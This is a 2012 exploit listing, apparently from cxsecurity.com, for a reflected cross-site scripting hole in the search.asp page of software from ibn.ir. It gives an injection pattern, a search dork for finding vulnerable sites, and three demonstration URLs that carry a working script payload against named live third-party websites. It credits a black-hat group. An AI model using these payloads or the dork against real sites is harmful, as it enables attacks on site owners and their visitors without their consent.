IBN Cross Site Scripting

2012.08.28
Credit: Net.W0lf
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################ ---------------------------------------------------------------- ibn (Search.asp) Cross Site Scripting Vulnerabilities ---------------------------------------------------------------- ################################################################ # Exploit Title : Ibn (search.asp) Cross Site Scripting Vulnerabilities # Author : Hack center Security Team # Discovered By : Net.W0lf # Software Link : http://www.ibn.ir/ # Security Risk : High # Version : All Version # Tested on : Win7 - Back Track # Dork : "?????? ?????" ################################################################ ---------------------------------------------------------------- +-----------------------+ | Cross Site Scripting | +-----------------------+ Expl0!T : [Target]/search.asp?m=notexists&text=[Xss] Dem0: www.ofoqco.com/search.asp?m=notexists&text="><script>alert(/hack center/)</script> www.qoqnoos.ir/search.asp?m=notexists&text="><script>alert(/hack center/)</script> www.osveh.ir/search.asp?m=notexists&text="><script>alert(/hack center/)</script> ############################################################################## Spical Tnx : Iranian Black Hat HackerZ ##############################################################################

References:

http://www.ibn.ir/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top